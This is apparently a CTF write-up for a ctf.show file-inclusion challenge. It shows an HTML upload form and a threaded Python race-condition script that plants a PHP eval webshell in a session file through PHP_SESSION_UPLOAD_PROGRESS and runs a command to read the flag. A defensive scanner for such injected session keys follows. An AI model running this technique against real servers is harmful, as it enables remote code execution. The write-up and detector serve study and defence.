1. This one builds on the previous challenge but additionally filters `.` and `flag`, so the nginx log file can no longer be used. Instead, include the session file, using the PHP_SESSION_UPLOAD_PROGRESS upload-progress feature. The underlying principle is not repeated here; see File Inclusion - web82.
  2. First, how to do it by hand: build an upload form, capture the upload request, add our custom session id, and construct our command.

```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>session upload</title>
</head>
<body>
<form action="http://ef9b7985-b104-4bbc-94c4-596133d834f1.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file1" />
<input type="submit" />
</form>
</body>
</html>
```


  1. Upload our ma.png and notice that `.` and `flag` are filtered. Change the include target to our custom session file, /tmp/sess_fl, and also rename the uploaded file so it has no extension, so that the `.` filter no longer triggers in .user.ini.
  2. Upload .user.ini.
  3. Because the session contents are cleared once the PHP_SESSION_UPLOAD_PROGRESS upload finishes, a race condition is needed: keep uploading and keep requesting the page at the same time. Use Burp's Intruder module to run the race.
  4. The Python script follows:

```python
# -*- coding: utf-8 -*-
"""
PS: first complete the two earlier steps (uploading .user.ini and ma);
this script only uploads upload_progress and runs the race condition.
"""
import requests
import io
import threading

url1 = "http://84a97d83-62d6-422b-a3db-5c74be7d7b8a.challenge.ctf.show:8080/"
url2 = url1 + "upload/index.php"
sess = "fl"
data = {"abc": "system('tac ../f*');"}

event = threading.Event()


def write(session):
    # Keep writing the payload into the session file through the upload-progress key
    while event.is_set():
        f = io.BytesIO(b"a" * 1024 * 50)
        session.post(url=url1,
                     data={"PHP_SESSION_UPLOAD_PROGRESS": '123<?php eval($_POST["abc"]);?>'},
                     cookies={"PHPSESSID": sess},
                     files={"file": ("1.txt", f)})


def read(session):
    # Keep requesting the page that includes the session file until the race is won
    while event.is_set():
        resp = session.post(url2, data=data)
        if "1.txt" in resp.text:
            print(resp.text)
            event.clear()  # stop every thread once the payload has executed
        else:
            # print("retry")
            pass


if __name__ == "__main__":
    event.set()  # must be set before the threads start, or their loops exit immediately
    with requests.session() as session:
        threads = []
        for i in range(30):
            threads.append(threading.Thread(target=write, args=(session,)))
        for i in range(30):
            threads.append(threading.Thread(target=read, args=(session,)))
        for t in threads:
            t.start()
        for t in threads:
            t.join()
```
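A defender-side check, added here and not part of the original write-up: the race above leaves PHP session files whose `upload_progress_` key carries a PHP open tag. This script scans a session directory for such keys; the sample session files are constructed inline, and the shortened serialized values are an assumption rather than real PHP output.

```python
import os
import re
import tempfile

# PHP's default session.upload_progress.prefix; the session key is prefix + POST value
UPLOAD_PROGRESS_PREFIX = "upload_progress_"
# With session.serialize_handler=php, entries are stored as key|serialized_value
KEY_RE = re.compile(r"(?:^|;)(" + re.escape(UPLOAD_PROGRESS_PREFIX) + r"[^|]*)\|")
PHP_TAG_RE = re.compile(r"<\?(?:php|=)?", re.IGNORECASE)


def suspicious_keys(blob: str) -> list:
    """Return upload_progress keys in a session blob that contain a PHP open tag."""
    return [k for k in KEY_RE.findall(blob) if PHP_TAG_RE.search(k)]


def scan_session_dir(path: str) -> dict:
    """Map each sess_* file name to the injected keys found inside it."""
    hits = {}
    for name in os.listdir(path):
        if not name.startswith("sess_"):
            continue
        with open(os.path.join(path, name), encoding="utf-8", errors="replace") as fh:
            keys = suspicious_keys(fh.read())
        if keys:
            hits[name] = keys
    return hits


def demo() -> dict:
    """Constructed sample: one benign session file and one carrying the injected key."""
    d = tempfile.mkdtemp()
    benign = 'upload_progress_123|a:2:{s:10:"start_time";i:1626836400;s:4:"done";b:1;}'
    injected = 'upload_progress_123<?php eval($_POST["abc"]);?>|a:1:{s:4:"done";b:0;}'
    with open(os.path.join(d, "sess_ok"), "w", encoding="utf-8") as fh:
        fh.write(benign)
    with open(os.path.join(d, "sess_fl"), "w", encoding="utf-8") as fh:
        fh.write(injected)
    return scan_session_dir(d)
```

Point `scan_session_dir` at the real session.save_path to check a server; a hit means session.upload_progress data was written with attacker-controlled content and the session directory should not be includable.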